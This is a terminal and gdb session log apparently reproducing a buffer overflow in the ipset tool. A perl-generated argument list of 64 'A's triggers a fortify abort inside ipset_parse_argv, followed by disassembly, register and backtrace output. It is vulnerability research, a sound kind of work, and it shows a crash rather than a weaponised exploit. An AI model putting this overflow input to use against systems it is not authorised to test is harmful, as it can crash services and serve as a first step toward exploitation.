[marshall@oxagast.org]{05:12 PM}: [~] $ ipset add a $(perl -e 'print "A "x64;')
*** buffer overflow detected ***: terminated
Aborted (core dumped)
[marshall@oxagast.org]{05:12 PM}: [~] $ gdb ipset
GNU gdb (Ubuntu 9.2-0ubuntu1~20.04) 9.2
Copyright (C) 2020 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ipset...
(No debugging symbols found in ipset)
(gdb) r add a $(perl -e 'print "A "x64;')
Starting program: /usr/sbin/ipset add a $(perl -e 'print "A "x64;')
*** buffer overflow detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50      ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) disas raise
Dump of assembler code for function __GI_raise:
   0x00007ffff7de50c0 <+0>:     endbr64
   0x00007ffff7de50c4 <+4>:     sub    $0x118,%rsp
   0x00007ffff7de50cb <+11>:    mov    %edi,%r8d
   0x00007ffff7de50ce <+14>:    xor    %edi,%edi
   0x00007ffff7de50d0 <+16>:    movdqa 0x179708(%rip),%xmm0        # 0x7ffff7f5e7e0
   0x00007ffff7de50d8 <+24>:    mov    %fs:0x28,%rax
   0x00007ffff7de50e1 <+33>:    mov    %rax,0x108(%rsp)
   0x00007ffff7de50e9 <+41>:    xor    %eax,%eax
   0x00007ffff7de50eb <+43>:    mov    %rsp,%r9
   0x00007ffff7de50ee <+46>:    mov    $0xe,%eax
   0x00007ffff7de50f3 <+51>:    lea    0x80(%rsp),%rsi
   0x00007ffff7de50fb <+59>:    movaps %xmm0,0x80(%rsp)
   0x00007ffff7de5103 <+67>:    pcmpeqd %xmm0,%xmm0
   0x00007ffff7de5107 <+71>:    mov    $0x8,%r10d
   0x00007ffff7de510d <+77>:    mov    %r9,%rdx
   0x00007ffff7de5110 <+80>:    movaps %xmm0,0x90(%rsp)
   0x00007ffff7de5118 <+88>:    movaps %xmm0,0xa0(%rsp)
   0x00007ffff7de5120 <+96>:    movaps %xmm0,0xb0(%rsp)
   0x00007ffff7de5128 <+104>:   movaps %xmm0,0xc0(%rsp)
   0x00007ffff7de5130 <+112>:   movaps %xmm0,0xd0(%rsp)
   0x00007ffff7de5138 <+120>:   movaps %xmm0,0xe0(%rsp)
   0x00007ffff7de5140 <+128>:   movaps %xmm0,0xf0(%rsp)
   0x00007ffff7de5148 <+136>:   syscall
   0x00007ffff7de514a <+138>:   mov    $0x27,%ecx
   0x00007ffff7de514f <+143>:   mov    %ecx,%eax
   0x00007ffff7de5151 <+145>:   syscall
   0x00007ffff7de5153 <+147>:   mov    %rax,%rdi
   0x00007ffff7de5156 <+150>:   mov    $0xba,%eax
   0x00007ffff7de515b <+155>:   syscall
   0x00007ffff7de515d <+157>:   mov    %eax,%esi
   0x00007ffff7de515f <+159>:   mov    %r8d,%edx
   0x00007ffff7de5162 <+162>:   mov    $0xea,%eax
   0x00007ffff7de5167 <+167>:   syscall
   0x00007ffff7de5169 <+169>:   cmp    $0xfffffffffffff000,%rax
   0x00007ffff7de516f <+175>:   ja     0x7ffff7de51b0 <__GI_raise+240>
   0x00007ffff7de5171 <+177>:   mov    %eax,%r8d
   0x00007ffff7de5174 <+180>:   mov    $0x8,%r10d
   0x00007ffff7de517a <+186>:   xor    %edx,%edx
   0x00007ffff7de517c <+188>:   mov    %r9,%rsi
   0x00007ffff7de517f <+191>:   mov    $0x2,%edi
   0x00007ffff7de5184 <+196>:   mov    $0xe,%eax
   0x00007ffff7de5189 <+201>:   syscall
=> 0x00007ffff7de518b <+203>:   mov    0x108(%rsp),%rax
   0x00007ffff7de5193 <+211>:   xor    %fs:0x28,%rax
   0x00007ffff7de519c <+220>:   jne    0x7ffff7de51c4 <__GI_raise+260>
   0x00007ffff7de519e <+222>:   mov    %r8d,%eax
   0x00007ffff7de51a1 <+225>:   add    $0x118,%rsp
   0x00007ffff7de51a8 <+232>:   retq
   0x00007ffff7de51a9 <+233>:   nopl   0x0(%rax)
   0x00007ffff7de51b0 <+240>:   mov    0x1a4cb9(%rip),%rdx        # 0x7ffff7f89e70
   0x00007ffff7de51b7 <+247>:   neg    %eax
   0x00007ffff7de51b9 <+249>:   mov    $0xffffffff,%r8d
   0x00007ffff7de51bf <+255>:   mov    %eax,%fs:(%rdx)
   0x00007ffff7de51c2 <+258>:   jmp    0x7ffff7de5174 <__GI_raise+180>
   0x00007ffff7de51c4 <+260>:   callq  0x7ffff7ed1b00 <__stack_chk_fail>
--Type <RET> for more, q to quit, c to continue without paging--
End of assembler dump.
(gdb) info reg
rax            0x0                 0
rbx            0x7ffff7b91b80      140737349491584
rcx            0x7ffff7de518b      140737351930251
rdx            0x0                 0
rsi            0x7fffffffd860      140737488345184
rdi            0x2                 2
rbp            0x7fffffffdbe0      0x7fffffffdbe0
rsp            0x7fffffffd860      0x7fffffffd860
r8             0x0                 0
r9             0x7fffffffd860      140737488345184
r10            0x8                 8
r11            0x246               582
r12            0x7fffffffdae0      140737488345824
r13            0x20                32
r14            0x7ffff7ffb000      140737354117120
r15            0x1                 1
rip            0x7ffff7de518b      0x7ffff7de518b <__GI_raise+203>
eflags         0x246               [ PF ZF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
k0             0x0                 0
k1             0x0                 0
k2             0x0                 0
k3             0x0                 0
k4             0x0                 0
k5             0x0                 0
k6             0x0                 0
k7             0x0                 0
(gdb) bt
#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7dc4859 in __GI_abort () at abort.c:79
#2  0x00007ffff7e2f3ee in __libc_message (action=action@entry=do_abort,
    fmt=fmt@entry=0x7ffff7f5907c "*** %s ***: terminated\n")
    at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7ed1b4a in __GI___fortify_fail (
    msg=msg@entry=0x7ffff7f59012 "buffer overflow detected") at fortify_fail.c:26
#4  0x00007ffff7ed03e6 in __GI___chk_fail () at chk_fail.c:28
#5  0x00007ffff7fa90e5 in ipset_parse_argv () from /lib/x86_64-linux-gnu/libipset.so.13
#6  0x0000555555555163 in ?? ()
#7  0x00007ffff7dc60b3 in __libc_start_main (main=0x555555555120, argc=67,
    argv=0x7fffffffdeb8, init=<optimized out>, fini=<optimized out>,
    rtld_fini=<optimized out>, stack_end=0x7fffffffdea8) at ../csu/libc-start.c:308
#8  0x00005555555551ee in ?? ()
(gdb) q
A debugging session is active.

        Inferior 1 [process 3376917] will be killed.

Quit anyway? (y or n) y